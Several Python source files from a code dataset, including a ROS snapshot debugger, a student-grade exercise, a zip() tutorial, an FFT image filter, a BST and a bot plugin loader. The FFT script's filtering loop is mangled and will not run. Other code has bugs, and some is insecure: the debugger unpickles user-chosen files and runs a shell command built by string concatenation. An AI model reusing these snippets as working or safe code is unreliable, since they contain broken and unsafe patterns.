pub = rospy.Publisher(newname, self.topic_type, latch=True, queue_size=1)\n pub.publish(msg)\n print(\"Sending msg to \" + newname)\n\n def stop(self):\n # stop and remove ros subscriber\n if self.subscriber is not None:\n self.subscriber.unregister()\n self.subscriber = None\n \n def resume(self):\n # recreate ros subscriber\n if self.subscriber is None:\n self.subscriber = self.listen()\n print(\"Resuming \" + self.topic_name)\n\n\nclass MainWindow(QMainWindow):\n currentRec = None\n topicType = {} \n\n def __init__(self):\n # setting up ui\n super(MainWindow, self).__init__()\n self.ui = Ui_eTeamDebugger()\n self.ui.setupUi(self)\n # binding buttons to py functions\n self.ui.addtopic.clicked.connect(self.addtopic)\n self.ui.removetopic.clicked.connect(self.removetopic)\n self.ui.newsnap.clicked.connect(self.newsnap)\n self.ui.removesnap.clicked.connect(self.removesnap)\n self.ui.playsnap.clicked.connect(self.playsnap)\n self.ui.updatetf.clicked.connect(self.updatetf)\n self.ui.exportsnapshots.triggered.connect(self.exportsnapshots)\n self.ui.exporttopic.triggered.connect(self.exporttopic)\n self.ui.importsnapshots.triggered.connect(self.importsnapshots)\n self.ui.importtopic.triggered.connect(self.importtopic)\n self.updatesnap()\n # creating default TF listener\n l = Listener()\n l.setup(\"/tf\", TFMessage)\n msg_listener[\"/tf\"] = l\n self.ui.topiclist.addItem(\"/tf\")\n msg_storage[\"/tf\"] = None\n self.topicType[\"/tf\"] = TFMessage\n\n def addtopic(self):\n # displaying dialog for topic name\n text, ok = QInputDialog.getText(self, 'Add new topic', 'Insert topic Path.\\nRemember the initial /')\n if ok:\n typ = \"\"\n allowed_type = [\"LaserScan\",\"PointCloud2\", \"TF\", \"Image\"]\n while True:\n typ, ok2 = QInputDialog.getText(self, 'Add new topic', 'Insert the type from [LaserScan, PointCloud2, TF, Image]')\n if ok:\n # checking if value is in \n if (typ in allowed_type):\n # updating ui and and global vars\n self.ui.topiclist.addItem(text)\n self.topicType[text] = typ\n # creating listener\n if typ == \"LaserScan\":\n typ = LaserScan\n elif typ == \"PointCloud2\":\n typ = PointCloud2\n elif typ == \"TF\":\n typ = TFMessage\n elif typ == \"Image\":\n typ = Image\n l = Listener()\n l.setup(text, typ)\n msg_listener[text] = l\n break;\n else:\n break; # user canceled\n else:\n break; # user canceled\n \n\n def removetopic(self):\n # getting selected topic\n sel = self.ui.topiclist.currentItem() \n if sel is None:\n return\n # removing it from ui and from listeners\n self.ui.topiclist.takeItem(self.ui.topiclist.currentRow())\n msg_listener[sel.text()].stop()\n \n def newsnap(self):\n # create a new snapshot\n # list every topic in the list and getting current timestamp\n items = [self.ui.topiclist.item(x).text() for x in range(self.ui.topiclist.count())]\n ts = datetime.now().isoformat()\n # storing each msg needed in snap\n msgs = {}\n for itm in items:\n if itm in msg_storage: \n msgs[itm] = msg_storage[itm]\n new = {\"topics\": items, \"ts\": ts, \"msgs\": msgs}\n snaps[ts] = new\n # updating ui\n self.updatesnap()\n\n def removesnap(self):\n # remove selected snapshot\n # getting selected snapshot\n sel = self.ui.snaplist.currentItem()\n if sel is None:\n return\n # removing it from global var and update ui\n del snaps[sel.text()]\n self.updatesnap()\n \n def playsnap(self):\n # broadcast snapshot\n # getting selected snapshot\n sel = self.ui.snaplist.currentItem() \n if sel is None:\n return\n # retrive needed vars\n sel = sel.text()\n topics = snaps[sel][\"topics\"] \n sel_safe = self.safe_topic(sel) # transforming timestamp in an allowed topic form\n \n # checking if RVIZ Open is selected\n if (self.ui.openrviz.isChecked()):\n # creating RVIZ config file for each topic in the snapshot\n rviz = rvizconfigurer.get_general()\n for topic in topics:\n new_name = topic + sel_safe\n if self.topicType[topic] == \"PointCloud2\":\n rviz += rvizconfigurer.get_PointCloud(new_name)\n elif self.topicType[topic] == \"LaserScan\":\n rviz += rvizconfigurer.get_LaserScan(new_name)\n elif self.topicType[topic] == \"Image\":\n rviz += rvizconfigurer.get_Image(new_name)\n rviz += rvizconfigurer.get_end(self.ui.tflist.currentItem())\n \n # storing the snapshot config file\n filename = \"snapshots/snapshot\"+sel+\".rviz\"\n f = open(filename, \"w\")\n f.write(rviz)\n f.close()\n # opening RVIZ and waiting for its opening\n Popen(\"rosrun rviz rviz -d '\"+filename+\"'\", shell=True)\n time.sleep(2)\n # publishing each msg in snapshot\n for topic in topics:\n l = msg_listener[topic]\n if topic == \"/tf\": \n l.send(None, \"\") # for /tf i don't need msg and newname\n else:\n new_name = topic + sel_safe # creating new topic name with topic + safe form of timestamp\n if topic in snaps[sel][\"msgs\"]:\n l.send(snaps[sel][\"msgs\"][topic], new_name)\n else:\n print(\"No \" + topic + \" data stored in this snapshot!\")\n\n def updatetf(self):\n # update ui with stored tfs\n self.ui.tflist.clear()\n for tf in tfs.keys():\n self.ui.tflist.addItem(tf)\n\n def exportsnapshots(self):\n # export snapshots and topic list to file\n self.stopListeners()\n tostore = [tfs, msg_storage, msg_listener, snaps, self.topicType]\n self.export(tostore, \"Save Topics and Snapshots\")\n\n def exporttopic(self):\n # export topic list to file\n self.stopListeners()\n tostore = [tfs, self.topicType, msg_listener]\n self.export(tostore, \"Save Topics\")\n\n def importsnapshots(self):\n # import snapshots and topic list from file\n global tfs\n global msg_listener\n global snaps\n global msg_storage\n data = self.imp(\"Import Topics and Snapshots\")\n if data is None:\n return\n self.stopListeners()\n\n # copying things to vars and updating ui\n tfs = data[0]\n msg_storage = data[1]\n msg_listener = data[2]\n snaps = data[3]\n self.topicType = data[4]\n #rebuilding ui and other vars\n self.ui.topiclist.clear()\n self.ui.tflist.clear()\n self.ui.snaplist.clear()\n for k in self.topicType.keys():\n self.ui.topiclist.addItem(k)\n for k in tfs.keys():\n self.ui.tflist.addItem(k)\n for k in snaps.keys():\n self.ui.snaplist.addItem(k)\n for l in msg_listener.values():\n l.resume()\n\n def importtopic(self):\n # import topic list from file\n global tfs\n global msg_listener\n global snaps\n global msg_storage\n\n data = self.imp(\"Import Topics\")\n if data is None:\n return\n self.stopListeners()\n\n # copying things to vars and updating ui\n tfs = data[0]\n self.topicType = data[1]\n msg_listener = data[2]\n print(msg_listener)\n self.ui.topiclist.clear()\n self.ui.tflist.clear()\n self.ui.snaplist.clear()\n snaps = {}\n msg_storage = {}\n for k,v in self.topicType.items():\n self.ui.topiclist.addItem(k)\n for k in tfs.keys():\n self.ui.tflist.addItem(k)\n for l in msg_listener.values():\n l.resume()\n \n\n def closeEvent(self, event):\n # stopping listeners on closing\n self.stopListeners()\n event.accept()\n\n #utils\n def imp(self, title):\n # show open file dialog and depickle selected file\n name = QFileDialog.getOpenFileName(self, title)\n if name[0] != \"\":\n with open(name[0], 'rb') as fp:\n return pickle.load(fp)\n return None\n\n def export(self, data, title):\n # show save file dialog and pickle passed data\n name = QFileDialog.getSaveFileName(self, title)\n if name[0] != \"\":\n with open(name[0], 'wb') as fp:\n pickle.dump(data, fp, protocol=pickle.HIGHEST_PROTOCOL)\n self.resumeListeners()\n\n def stopListeners(self):\n # stop all listeners\n for k,v in msg_listener.items():\n v.stop()\n\n def resumeListeners(self):\n # resume all listeners\n for k,v in msg_listener.items():\n v.resume()\n\n def updatesnap(self):\n # update ui snaps list \n self.ui.snaplist.clear()\n for k in snaps.keys():\n self.ui.snaplist.addItem(k)\n\n def get_topics(self):\n # get all topics from ui topics list\n topics = []\n for i in range(self.ui.topiclist.count()):\n topics.append(self.ui.topiclist.item(i).text())\n return topics\n\n def safe_topic(self, name):\n # remove banned chars for topic name\n return name.replace(\":\",\"\").replace(\"-\",\"\").replace(\".\",\"\")\n\nif __name__ == \"__main__\":\n # launching GUI\n app = QApplication(sys.argv)\n\n window = MainWindow()\n window.show()\n\n sys.exit(app.exec())\n\n\n","repo_name":"unipi-smartapp-2021/eTeamDebugger","sub_path":"debugger.py","file_name":"debugger.py","file_ext":"py","file_size_in_byte":12226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37479158767","text":"\"\"\"\n学生类Student:\n 属性:学号,姓名,年龄,性别,成绩\n班级类Grade:\n 属性:班级名称,班级中的学生 【使用列表存储学生】\n 方法:\n 1.查看该班级中的所有学生的信息\n 2.查看指定学号的学生信息\n 3.查看班级中成绩不及格的学生信息\n 4.将班级中的学生按照成绩降序排序\n\"\"\"\n\n\nclass Student(object):\n def __init__(self, num, name, age, gender, score):\n self.num = num\n self.name = name\n self.age = age\n self.gender = gender\n self.score = score\n\n def __str__(self):\n return '学号:{},姓名:{},年龄:{},性别:{},成绩:{}'.format(self.num, self.name, self.age, self.gender, self.score)\n\n\nclass Grade(object):\n def __init__(self, name, stu_list=None):\n if stu_list is None:\n stu_list = []\n self.name = name\n self.stu_list = stu_list\n\n def get_student(self):\n if len(self.stu_list) == 0:\n print(self.name + '这个班级里还没有学生')\n else:\n print('班级名称:{},班级里有{}个学生,他们是'.format(self.name, len(self.stu_list)))\n for stu in self.stu_list:\n print(stu)\n\n def get_stuById(self, n):\n for stu in self.stu_list:\n if stu.id == n:\n return stu\n else:\n return '未找到学号为{}的学生'.format(n)\n\n def get_stuUnpass(self):\n if len(self.stu_list) != 0:\n # for stu in self.stu_list:\n # if stu.score < 60:\n # print(stu)\n result = filter(lambda student: student.score < 60, self.stu_list)\n for stu in result:\n print(stu)\n else:\n print(self.name + '班级里还没有学生')\n\n def order_by_score(self):\n if len(self.stu_list) != 0:\n self.stu_list.sort(key=lambda student: student.score, reverse=True)\n # sorted(self.stu_list, key=lambda s: s.score, reverse=True)\n return self.stu_list\n\n\ns1 = Student('1204001', '李明', 16, '男', 88)\ns2 = Student('1204002', '萧强', 15, '男', 60)\ns3 = Student('1204008', '韩梅梅', 17, '女', 72)\ns4 = Student('1204022', '王思锦', 16, '女', 58)\n\ng = Grade('软件一班', [s1, s2, s3, s4])\ng1 = Grade('软件二班')\n\n# print(s1)\n# g.get_student()\n# print(g.get_stuById('1204008'))\n# g.get_stuUnpass()\nx = g.order_by_score()\nfor i in x:\n print(i)\n\n# g1.get_student()\n# print(g1.get_stuById('1204001'))\n# g1.get_stuUnpass()\n# y = g1.order_by_score()\n# print(y)\n","repo_name":"Frecy16/learning","sub_path":"py_study/exceptionHandle/练习3.py","file_name":"练习3.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23802754798","text":"print(dir(__builtins__)) # those are classes and method that we have available in python\n\"\"\"\n['ArithmeticError', 'AssertionError', 'AttributeError', 'BaseException', 'BlockingIOError', 'BrokenPipeError', 'BufferError', \n'BytesWarning', 'ChildProcessError', 'ConnectionAbortedError', 'ConnectionError', 'ConnectionRefusedError', 'ConnectionResetError', \n'DeprecationWarning', 'EOFError', 'Ellipsis', 'EnvironmentError', 'Exception', 'False', 'FileExistsError', 'FileNotFoundError', \n'FloatingPointError', 'FutureWarning', 'GeneratorExit', 'IOError', 'ImportError', 'ImportWarning', 'IndentationError', 'IndexError', \n'InterruptedError', 'IsADirectoryError', 'KeyError', 'KeyboardInterrupt', 'LookupError', 'MemoryError', 'ModuleNotFoundError', 'NameError',\n'None', 'NotADirectoryError', 'NotImplemented', 'NotImplementedError', 'OSError', 'OverflowError', 'PendingDeprecationWarning', \n'PermissionError', 'ProcessLookupError', 'RecursionError', 'ReferenceError', 'ResourceWarning', 'RuntimeError', 'RuntimeWarning', \n'StopAsyncIteration', 'StopIteration', 'SyntaxError', 'SyntaxWarning', 'SystemError', 'SystemExit', 'TabError', 'TimeoutError', \n'True', 'TypeError', 'UnboundLocalError', 'UnicodeDecodeError', 'UnicodeEncodeError', 'UnicodeError', 'UnicodeTranslateError', \n'UnicodeWarning', 'UserWarning', 'ValueError', 'Warning', 'ZeroDivisionError', '__build_class__', '__debug__', '__doc__', '__import__', \n'__loader__', '__name__', '__package__', '__spec__', 'abs', 'all', 'any', 'ascii', 'bin', 'bool', 'breakpoint', 'bytearray', 'bytes', \n'callable', 'chr', 'classmethod', 'compile', 'complex', 'copyright', 'credits', 'delattr', 'dict', 'dir', 'divmod', 'enumerate', 'eval', \n'exec', 'exit', 'filter', 'float', 'format', 'frozenset', 'getattr', 'globals', 'hasattr', 'hash', 'help', 'hex', 'id', 'input', 'int', \n'isinstance', 'issubclass', 'iter', 'len', 'license', 'list', 'locals', 'map', 'max', 'memoryview', 'min', 'next', 'object', 'oct', \n'open', 'ord', 'pow', 'print', 'property', 'quit', 'range', 'repr', 'reversed', 'round', 'set', 'setattr', 'slice', 'sorted', \n'staticmethod', 'str', 'sum', 'super', 'tuple', 'type', 'vars', 'zip']\n\n\"\"\"\n\nhelp(zip)\n\"\"\"\nclass zip(object)\n | zip(*iterables) --> A zip object yielding tuples until an input is exhausted.\n | \n | >>> list(zip('abcdefg', range(3), range(4)))\n | [('a', 0, 0), ('b', 1, 1), ('c', 2, 2)]\n | \n | The zip object yields n-length tuples, where n is the number of iterables\n | passed as positional arguments to zip(). The i-th element in every tuple\n | comes from the i-th iterable argument to zip(). This continues until the\n | shortest argument is exhausted.\n | \n | Methods defined here:\n | \n | __getattribute__(self, name, /)\n | Return getattr(self, name).\n | \n | __iter__(self, /)\n | Implement iter(self).\n | \n | __next__(self, /)\n | Implement next(self).\n | \n | __reduce__(...)\n | Return state information for pickling.\n | \n | ----------------------------------------------------------------------\n | Static methods defined here:\n | \n | __new__(*args, **kwargs) from builtins.type\n | Create and return a new object. See help(type) for accurate signature.\n\n\nProcess finished with exit code 0\n\n\"\"\"\n\n# so we can build iterables to build tuples\n\nnumbers = [1,2,3]\nletters = ['a','b','c']\nmix = zip(numbers, letters)\nprint(mix)\n\"\"\"\nso we have an object type zip \n\n\"\"\"\nprint(list(mix))\n\"\"\"\n[(1, 'a'), (2, 'b'), (3, 'c')]\n\"\"\"\nprint(f' this is a tuple{tuple(zip(numbers, letters))}')\n\"\"\"\n this is a tuple((1, 'a'), (2, 'b'), (3, 'c'))\n\"\"\"\n\n# iterable with many elements at the same time\nfor numbers, letters in zip(numbers, letters):\n print(f'Numbers: {numbers}, Letters: {letters}')\n\n\"\"\"\nNumbers: 1, Letters: a\nNumbers: 2, Letters: b\nNumbers: 3, Letters: c\n\"\"\"\n\n\"\"\"\nnewList = []\nfor numbers, letters in zip(numbers, letters):\n newList.append(f'{numbers}-{letters}')\nprint(newList)\n\"\"\"\n\"\"\"\n\n['1-a', '2-b', '3-c']\n\"\"\"\n\n# unzip\nunmix = [(1,'a'),(2,'b'),(3,'c')]\nun_numbers, un_letters = zip(*unmix)\nprint(f'Number {un_numbers} and letters {un_letters}')\n\"\"\"\nNumber (1, 2, 3) and letters ('a', 'b', 'c') \n\"\"\"\n\n# create a dictionary from list\n\nmykeys = ['Name', 'Las name', 'Age']\nvalues = ['Michael', 'Fernández', 18]\nmydictionary = dict(zip(mykeys, values))\nprint(mydictionary)\n\"\"\"\n{'Name': 'Michael', 'Las name': 'Fernández', ' Age': 18}\n\"\"\"\n\n# update a element from our dictionary\nthiskey = ['Age']\nnew_age = [45]\nmydictionary.update(zip(thiskey, new_age))\nprint(mydictionary)\n\"\"\"\n{'Name': 'Michael', 'Las name': 'Fernández', 'Age': 45}\n\"\"\"","repo_name":"deanminik/python","sub_path":"venv/zip-function/zip_function.py","file_name":"zip_function.py","file_ext":"py","file_size_in_byte":4606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74044655607","text":"from os import path as os_path\r\nfrom typing import Any, Dict\r\n\r\nfrom yaml import safe_dump as yaml_dump\r\nfrom yaml import safe_load as yaml_load\r\n\r\n_DEFAULT_CONFIG = {\r\n \"version\": \"v0.1.0\",\r\n \"base_path\": \"./app\",\r\n \"deploy\": {\r\n \"debug\": False,\r\n \"enable_PyWebIO_CDN\": False,\r\n \"PyWebIO_CDN\": \"\",\r\n \"PyEcharts_CDN\": \"\",\r\n \"port\": 8080,\r\n },\r\n \"queue_processor\": {\r\n \"check_interval\": 10,\r\n \"threads\": 3,\r\n },\r\n \"fetcher\": {\r\n \"sleep_interval_low\": 0,\r\n \"sleep_interval_high\": 0,\r\n },\r\n \"general_analyzer\": {\r\n \"analyze_interval\": 3600,\r\n },\r\n \"footer\": \"\",\r\n \"word_split_ability\": {\r\n \"host\": \"localhost\",\r\n \"port\": 6001,\r\n },\r\n \"db\": {\r\n \"host\": \"localhost\",\r\n \"port\": 27017,\r\n \"main_database\": \"WD2022Data\",\r\n },\r\n \"log\": {\r\n \"minimum_record_level\": \"DEBUG\",\r\n \"minimum_print_level\": \"INFO\",\r\n },\r\n}\r\n\r\n\r\nclass Config:\r\n def __new__(cls) -> \"Config\":\r\n # 单例模式\r\n if not hasattr(cls, \"_instance\"):\r\n cls._instance = object.__new__(cls)\r\n return cls._instance\r\n\r\n def __init__(self) -> None:\r\n if not os_path.exists(\"config.yaml\"): # 没有配置文件\r\n with open(\"config.yaml\", \"w\", encoding=\"utf-8\") as f:\r\n yaml_dump(\r\n _DEFAULT_CONFIG,\r\n f,\r\n allow_unicode=True,\r\n indent=4,\r\n sort_keys=False,\r\n )\r\n self._data = _DEFAULT_CONFIG\r\n else: # 有配置文件\r\n with open(\"config.yaml\", encoding=\"utf-8\") as f:\r\n self._data = yaml_load(f)\r\n\r\n def __getattr__(self, name: str) -> Any:\r\n result: Any = self._data[name]\r\n if isinstance(result, dict):\r\n return ConfigNode(result)\r\n\r\n return result\r\n\r\n def refresh(self) -> None:\r\n self.__init__()\r\n\r\n\r\nclass ConfigNode:\r\n def __init__(self, data: Dict[str, Any]) -> None:\r\n self._data: Dict[str, Any] = data\r\n\r\n def __getattr__(self, name: str) -> Any:\r\n return self._data[name]\r\n\r\n\r\ndef init_config() -> Config:\r\n return Config() # 初始化日志文件\r\n\r\n\r\nconfig = init_config()\r\n","repo_name":"FHU-yezi/WriteDown2022","sub_path":"utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"42199984908","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport scipy.fftpack as sfft\r\nfrom matplotlib import image as mpimg\r\n\r\n\r\nimg = mpimg.imread(\"Fruit.jpg\")\r\nplt.imshow(img)\r\nplt.show()\r\n\r\n#fft\r\nimgf = sfft.fft2(img)\r\nplt.imshow(np.abs(imgf))\r\nplt.show()\r\n#image with fft shift\r\nimgf = sfft.fftshift(imgf)\r\nplt.imshow(np.abs(imgf))\r\nplt.show()\r\n\r\n#inverse fft\r\nimg1 = sfft.ifft2(imgf)\r\nplt.imshow(np.abs(img1))\r\nplt.show()\r\n\r\n#remove high frequencies\r\nimgf1 = np.zeros((360,360),dtype=complex)\r\nc = 180\r\nr = 50\r\nfor m in range(0,360):\r\n for n in range(0,360):\r\n if (np.sqrt(((m-c)**2 + (n-c)**2))r):\r\n imgf1[m,n] = imgf[m,n]\r\n\r\nplt.imshow(np.abs(imgf1))\r\nplt.show()\r\nimg1 = sfft.ifft2(imgf1)\r\nplt.imshow(np.abs(img1))\r\nplt.show()\r\n\r\n","repo_name":"alfanashfak2001/python_maths","sub_path":"Question_04_a.py","file_name":"Question_04_a.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38033879754","text":"from common.models.crm import Group, UserGroup\n\n\ndef get_user_group(user_id):\n \"\"\"\n 获取单个用户的用户组\n :param user_id:\n :return:\n \"\"\"\n user_groups = UserGroup.query.filter_by(user_id=user_id).all()\n group_list = []\n for user_group in user_groups:\n group_detail = {}\n group = Group.query.filter_by(id=user_group.group_id).first()\n group_detail[\"group_id\"] = group.id\n group_detail[\"name\"] = group.name\n\n group_list.append(group_detail)\n\n return group_list\n\n\n","repo_name":"Enzozzzz/crm","sub_path":"common/utils/rbac/get_groups.py","file_name":"get_groups.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} +{"seq_id":"72797588409","text":"\r\n# class Node():\r\n# def __init__(self, parent=None, position=None, label=None):\r\n# self.parent = parent\r\n# self.position = position\r\n# self.label = label\r\n\r\n# self.g = 0\r\n# self.h = 0\r\n# self.f = 0\r\n\r\n# def __eq__(self, other):\r\n# return self.position == other.position\r\n\r\n# def astar(list_of_point, labels, mat_adj):\r\n\r\n# open_list = []\r\n# closed_list = []\r\n# visited_list = []\r\n \r\n# start_node = Node(None, list_of_point[0], labels[0])\r\n# start_node.g = start_node.h = start_node.f = 0\r\n \r\n# end_node = Node(None, list_of_point[-1], labels[-1])\r\n# end_node.g = end_node.h = end_node.f = 0\r\n \r\n# open_list.append(start_node)\r\n \r\n# while len(open_list) > 0:\r\n# current_node = open_list[0]\r\n# current_index = 0\r\n# for index, item in enumerate(open_list):\r\n# if item.f < current_node.f:\r\n# current_node = item\r\n# current_index = index\r\n \r\n# del open_list[current_index]\r\n# closed_list.append(current_node)\r\n# visited_list.append(current_node.position)\r\n \r\n# print(\"cur\")\r\n# for node in open_list:\r\n# print(node.label)\r\n# # Found the goal\r\n# if current_node == end_node:\r\n# path = []\r\n# current = current_node\r\n# while current is not None:\r\n# path.append(current.label)\r\n# current = current.parent\r\n# return path[::-1] # Return reversed path\r\n \r\n# children = []\r\n# neighbour_index = 0\r\n# print(current_index)\r\n# for bool in mat_adj[current_index]:\r\n# if bool == 1 and list_of_point[neighbour_index] not in visited_list:\r\n# child_node = Node(current_node, list_of_point[neighbour_index], labels[neighbour_index])\r\n# children.append(child_node)\r\n# neighbour_index += 1\r\n \r\n# for child in children:\r\n \r\n# for closed_child in closed_list:\r\n# if child == closed_child:\r\n# continue\r\n \r\n# # Create the f, g, and h values\r\n# # child.g = current_node.g + haversineDistance(current_node.position, child.position)\r\n# # child.h = haversineDistance(end_node.position, current_node.position)\r\n# # child.f = child.g + child.h\r\n\r\n# # Child is already in the open list\r\n# for open_node in open_list:\r\n# if child == open_node and child.g > open_node.g:\r\n# continue\r\n\r\n# # Add the child to the open list\r\n# open_list.append(child)\r\ndef perms(size):\r\n dasar = tuple(range(1, size+1))\r\n length = size\r\n\r\n maxnumberofiter = 0\r\n for i in range(1,size+1):\r\n maxnumberofiter *= i\r\n\r\n arrayofnum = []\r\n for i in range(length):\r\n arrayofnum.append(i)\r\n\r\n perulangan = []\r\n for i in range(length, length-size, -1):\r\n perulangan.append(i)\r\n\r\n yield list(dasar[i] for i in arrayofnum[:size])\r\n\r\n count = 0\r\n while True or count <= maxnumberofiter:\r\n for i in range(size-1, -1, -1):\r\n perulangan[i] -= 1\r\n count += 1\r\n if perulangan[i] == 0:\r\n arrayofnum[i:] = arrayofnum[i+1:]+arrayofnum[i:i+1]\r\n perulangan[i] = length - i\r\n else:\r\n j = perulangan[i]\r\n swap(arrayofnum, i, -j)\r\n yield list(dasar[i] for i in arrayofnum[:size])\r\n break\r\n else:\r\n return\r\n\r\ndef swap(arr, i, j):\r\n temp = arr[i]\r\n arr[i] = arr[j]\r\n arr[j] = temp\r\n return","repo_name":"kahfizulkifli/mathdoku","sub_path":"engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11189172637","text":"import os\n\n# Directory where the files are located\ndirectory = \"card_images\"\n\n# Change to the directory\nos.chdir(directory)\n\n# Mapping of card ranks to their corresponding names\nrank_mapping = {\n \"6\": \"6\",\n \"7\": \"7\",\n \"8\": \"8\",\n \"9\": \"9\",\n \"10\": \"10\",\n \"11\": \"jack\",\n \"12\": \"queen\",\n \"13\": \"king\",\n \"1\": \"ace\",\n}\n\n# Mapping of card suits to their corresponding names\nsuit_mapping = {\n \"diamond\": \"diamonds\",\n \"heart\": \"hearts\",\n \"spade\": \"spades\",\n \"club\": \"clubs\",\n}\n\n# Iterate through each file in the directory\nfor suit in suit_mapping:\n os.chdir(suit)\n for filename in os.listdir(\".\"):\n # Check if the file is a regular file\n if os.path.isfile(filename):\n # Check if the file has a valid name to be renamed\n rank = os.path.splitext(filename)[0]\n if rank in rank_mapping and os.path.splitext(filename)[1] == \".png\":\n # Construct the new filename with suit and rank\n new_filename = f\"{suit_mapping[suit]}_{rank_mapping[rank]}.png\"\n\n # Rename the file\n os.rename(filename, new_filename)\n print(f\"Renamed: {filename} -> {new_filename}\")\n # Check if the file ends with \".svg\" and delete it\n elif filename.endswith(\".svg\") or rank not in rank_mapping:\n os.remove(filename)\n print(f\"Deleted: {filename}\")\n os.chdir(\"..\")\n","repo_name":"SkylerMime/NinetyNine","sub_path":"ninety_nine/file_renamer.py","file_name":"file_renamer.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73747833530","text":"class BST:\n def __init__(self, data):\n self.data = data\n self.left = None \n self.right = None \n\n def addNode(self, data):\n if self.data == data:\n return \n\n if data < self.data:\n if self.left:\n self.left.addNode(data)\n else:\n self.left = BST(data)\n else:\n if self.right:\n self.right.addNode(data)\n else:\n self.right = BST(data)\n\n\n def search(self, data):\n if self.data == data: return True \n\n if data < self.data:\n if self.left:\n return self.left.search(data)\n else:\n return False \n else:\n if self.right:\n return self.right.search(data)\n else:\n return False \n\n \n def InorderTraversal(self):\n elements = []\n if self.left:\n elements += self.left.InorderTraversal()\n elements.append(self.data)\n if self.right:\n elements += self.right.InorderTraversal()\n return elements\n\n\ndef BuildTree(elem):\n bst = BST(elem[0])\n for x in range(1, len(elem)):\n bst.addNode(elem[x])\n return bst\n\n \n\n\nif __name__ == \"__main__\":\n elem = [17,16,5,2,1,90,66,77]\n bst = BuildTree(elem)\n print(bst.InorderTraversal())\n ","repo_name":"BALAVIGNESHDOSTRIX/PyExpert","sub_path":"Datastructures/bst-dfs.py","file_name":"bst-dfs.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15743896782","text":"# coding:utf8\n\n\nimport os\nimport imp\nimport time\nimport types\nimport random\nimport traceback\n\nfrom .. import utils\n\n\ndef default_plugin__accept_request(self, msg, rsp, utils, *args, **kwargs):\n if msg.was_appeal and msg.args[0].lower() in self.keywords:\n return True\n\n return False\n\n\nclass Pluginmanager(object):\n def __init__(self, bot, vkr):\n self.plugins = {}\n self.plugin_list = []\n self.builtin_plugin_list = []\n self.custom_plugin_list = []\n self.log = lambda *x, **y: None\n self.bot = bot\n self.utils = PluginUtils(self, self.bot, vkr, self.log)\n\n def plugin_respond(self, msg, rsp):\n for name in self.plugin_list:\n if not self.plugins[name]._accept_request(msg, rsp, self.utils):\n continue\n\n user_access_level = self.utils.get_user_access_level(msg)\n\n if user_access_level < self.plugins[name].protection:\n rsp.text = (\n u'Для использования команды необходим уровень доступа %d.\\n'\n u'Ваш уровень доступа: %d'\n % (self.plugins[name].protection, user_access_level)\n )\n break\n\n if self.plugins[name].argument_required:\n if len(msg.args) < 2:\n rsp.text = \\\n u'Эту команду можно использовать только с аргументом'\n break\n\n rsp = self.plugins[name].respond(msg, rsp, self.utils)\n break\n\n return rsp\n\n def load_plugins(self):\n self.plugins = {}\n self.plugin_list = []\n self.builtin_plugin_list = []\n self.custom_plugin_list = []\n\n if not os.path.exists(utils.CUSTOM_PLUGIN_DIR):\n self.log(\n u'Создание директории для пользовательских плагинов: %s ...'\n % utils.CUSTOM_PLUGIN_DIR, 1\n )\n os.mkdir(utils.CUSTOM_PLUGIN_DIR)\n\n self.log(u'Чтение встроенных плагинов ...', 0)\n self._load_plugins_from(utils.PLUGIN_DIR)\n\n for p in self.plugins:\n self.builtin_plugin_list.append(p)\n\n self.log(u'Чтение пользовательских плагинов ...', 1)\n self._load_plugins_from(utils.CUSTOM_PLUGIN_DIR)\n\n for p in sorted(self.plugins, key=lambda x: self.plugins[x].priority,\n reverse=True):\n self.plugin_list.append(p)\n\n self.builtin_plugin_list = set(self.builtin_plugin_list)\n\n self.custom_plugin_list = \\\n set(set(self.plugin_list) - self.builtin_plugin_list)\n\n self.log(\n u'Загружены плагины: [b]%s[/b]' % ', '.join(self.plugin_list), 0)\n\n def _load_plugins_from(self, path):\n files = sorted(os.listdir(path)) # sorting to ensure that .py goes first\n included = []\n\n for f in files:\n if f.startswith('plugin_'):\n try:\n if f.endswith('.py'):\n if f + 'c' in files:\n if os.path.getmtime(os.path.join(path, f + 'c')) > os.path.getmtime(os.path.join(path, f)):\n # .pyc newer\n continue\n\n elif f + 'o' in files:\n if os.path.getmtime(os.path.join(path, f + 'o')) > os.path.getmtime(os.path.join(path, f)):\n # .pyo newer\n continue\n\n self._add_plugin(\n imp.load_source('', os.path.join(path, f)), f, f[7:-3])\n\n included.append(f)\n\n elif f.endswith('.pyc') or f.endswith('.pyo'):\n if f[:-1] in included:\n continue\n\n if f.endswith('c') and f[:-1] + 'o' in files:\n if os.path.getmtime(os.path.join(path, f[:-1] + 'o')) > os.path.getmtime(os.path.join(path, f)):\n # .pyo newer\n continue\n elif f[:-1] + 'c' in files:\n if os.path.getmtime(os.path.join(path, f[:-1] + 'c')) > os.path.getmtime(os.path.join(path, f)):\n # .pyc newer\n continue\n\n self._add_plugin(\n imp.load_compiled('', os.path.join(path, f)), f, f[7:-4])\n\n included.append(f[:-1])\n\n except Exception:\n self.log(u'[b]Ошибка при загрузке плагина %s[/b]' % f, 2)\n self.log(traceback.format_exc().decode('utf8'), 2)\n\n def _add_plugin(self, plugin, f, name):\n p = plugin.Plugin()\n\n if getattr(p, 'disabled', False):\n return\n\n if getattr(p, 'name', None) is None:\n self.log(\n u'[b]Предупреждение: отсутствует имя модуля %s. Использую %s[/b]' \n % (f, name), 